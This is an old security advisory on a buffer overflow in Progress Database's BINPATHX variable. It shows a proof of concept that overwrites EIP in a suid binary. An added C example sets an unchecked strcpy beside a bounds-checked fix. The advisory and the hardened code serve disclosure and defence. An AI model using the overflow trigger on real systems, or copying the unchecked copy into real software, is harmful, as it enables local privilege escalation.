16th Apr 2003 [SBWID-6160]
Progress Database unchecked buffer in BINPATHX leads to overflow
v9.1D up to 9.1D05
In Secure Network Operations, Inc. Strategic Reconnaissance Team
advisory SRT2003-04-15-1029 [http://www.secnetops.com]:
With version 9.1D, several things have changed in the Progress codebase.
One such change is the addition of the BINPATHX variable. At first
glance, the BINPATHX variable appears to tell Progress binaries where to
find shared library files and other installation files. Unfortunately,
no bounds checking is done while the variable is read. If an attacker
supplies enough data, an overflow will occur, overwriting critical
memory registers including EIP.
rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
rootme $ gdb -q /usr/dlc/bin/_proapsv
Starting program: /usr/dlc/bin/_proapsv
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
#0 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
Install 9.1D05, or run chmod -s on all suid binaries.
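
The missing bounds check described above, as an added C example that is not taken from the advisory or from Progress's code: an unchecked copy of BINPATHX beside a length-checked reader that also ignores the variable in a set-id process. The 200-byte buffer size, the function names and the fallback to /usr/dlc/bin are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BINPATH_MAX     200             /* assumed size, not Progress's real one */
#define BINPATH_DEFAULT "/usr/dlc/bin"  /* install path shown in the advisory */

/* The defect class described above: the copy trusts the variable's length.
 * A 240-byte value written into BINPATH_MAX bytes runs past the end of dst. */
void load_binpath_unchecked(char *dst)
{
    const char *v = getenv("BINPATHX");
    if (v != NULL)
        strcpy(dst, v);                 /* no bounds check */
}

/* Hardened core, kept separate from getenv() so it can be tested directly.
 * Returns 0 if the value was accepted, 1 if the built-in default was used,
 * -1 if dst cannot even hold the default. */
int resolve_binpath(const char *value, int privileged, char *dst, size_t dstlen)
{
    if (dst == NULL || dstlen < sizeof(BINPATH_DEFAULT))
        return -1;
    /* Fall back when the value is unset or empty, when the caller controls
     * the environment of a set-id process, or when it would not fit with NUL. */
    if (value == NULL || value[0] == '\0' || privileged || strlen(value) >= dstlen) {
        memcpy(dst, BINPATH_DEFAULT, sizeof(BINPATH_DEFAULT));
        return 1;
    }
    memcpy(dst, value, strlen(value) + 1);
    return 0;
}

/* Wrapper: the process counts as privileged when its effective and real ids
 * differ, which is the case for the suid binaries the advisory mentions. */
int load_binpath_checked(char *dst, size_t dstlen)
{
    int privileged = geteuid() != getuid() || getegid() != getgid();
    return resolve_binpath(getenv("BINPATHX"), privileged, dst, dstlen);
}

int main(void)
{
    char path[BINPATH_MAX];
    int rc = load_binpath_checked(path, sizeof path);
    printf("rc=%d path=%s\n", rc, rc < 0 ? "(none)" : path);
    return 0;
}
```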